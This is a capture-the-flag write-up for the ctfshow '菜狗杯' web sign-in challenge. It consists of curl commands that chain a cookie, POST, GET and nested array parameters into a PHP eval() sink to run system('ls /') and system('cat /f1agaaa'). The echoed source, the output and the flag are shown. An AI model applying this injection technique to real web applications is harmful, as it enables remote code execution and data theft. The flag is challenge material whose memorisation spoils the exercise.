WriteUp_新手必刷_菜狗杯 web签到 100

┌──(kali㉿AyxGaming)-[~]
└─$ curl -b "CTFshow-QQ群:=A"      -d "A=B"      --data-urlencode "C[6][0][7][5][8][0][9][4][4]=system('ls /');"      "http://4592fb23-ed52-458f-bb61-5b995b590787.challenge.ctf.sh
ow/?B=C"
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /><br /></span><span style="color: #FF8000">/*<br />#&nbsp;-*-&nbsp;coding:&nbsp;utf-8&nbsp;-*-<br />#&nbsp;@Author:&nbsp;h1xa<br />#&nbsp;@Date:&nbsp;&nbsp;&nbsp;2022-11-10&nbsp;17:20:38<br />#&nbsp;@Last&nbsp;Modified&nbsp;by:&nbsp;&nbsp;&nbsp;h1xa<br />#&nbsp;@Last&nbsp;Modified&nbsp;time:&nbsp;2022-11-11&nbsp;09:38:59<br />#&nbsp;@email:&nbsp;h1xa@ctfer.com<br />#&nbsp;@link:&nbsp;https://ctfer.com<br /><br />*/<br /><br /><br /></span><span style="color: #0000BB">error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /><br />eval(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #0000BB">$_COOKIE</span><span style="color: #007700">[</span><span style="color: #DD0000">'CTFshow-QQ群:'</span><span style="color: #007700">]]]][</span><span style="color: #0000BB">6</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">][</span><span style="color: #0000BB">7</span><span style="color: #007700">][</span><span style="color: #0000BB">5</span><span style="color: #007700">][</span><span style="color: #0000BB">8</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">][</span><span style="color: #0000BB">9</span><span style="color: #007700">][</span><span style="color: #0000BB">4</span><span style="color: #007700">][</span><span style="color: #0000BB">4</span><span style="color: #007700">]);<br /></span>
</span>
</code>bin
dev
etc
f1agaaa
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var
┌──(kali㉿AyxGaming)-[~]
└─$ curl -b "CTFshow-QQ群:=A"      -d "A=B"      --data-urlencode "C[6][0][7][5][8][0][9][4][4]=system('cat /f1agaaa');"      "http://4592fb23-ed52-458f-bb61-5b995b590787.challeng
e.ctf.show/?B=C"
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /><br /></span><span style="color: #FF8000">/*<br />#&nbsp;-*-&nbsp;coding:&nbsp;utf-8&nbsp;-*-<br />#&nbsp;@Author:&nbsp;h1xa<br />#&nbsp;@Date:&nbsp;&nbsp;&nbsp;2022-11-10&nbsp;17:20:38<br />#&nbsp;@Last&nbsp;Modified&nbsp;by:&nbsp;&nbsp;&nbsp;h1xa<br />#&nbsp;@Last&nbsp;Modified&nbsp;time:&nbsp;2022-11-11&nbsp;09:38:59<br />#&nbsp;@email:&nbsp;h1xa@ctfer.com<br />#&nbsp;@link:&nbsp;https://ctfer.com<br /><br />*/<br /><br /><br /></span><span style="color: #0000BB">error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br /><br />eval(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #0000BB">$_COOKIE</span><span style="color: #007700">[</span><span style="color: #DD0000">'CTFshow-QQ群:'</span><span style="color: #007700">]]]][</span><span style="color: #0000BB">6</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">][</span><span style="color: #0000BB">7</span><span style="color: #007700">][</span><span style="color: #0000BB">5</span><span style="color: #007700">][</span><span style="color: #0000BB">8</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">][</span><span style="color: #0000BB">9</span><span style="color: #007700">][</span><span style="color: #0000BB">4</span><span style="color: #007700">][</span><span style="color: #0000BB">4</span><span style="color: #007700">]);<br /></span>
</span>
</code>ctfshow{e101e8e5-ac81-4080-b11a-35767eb78dbb}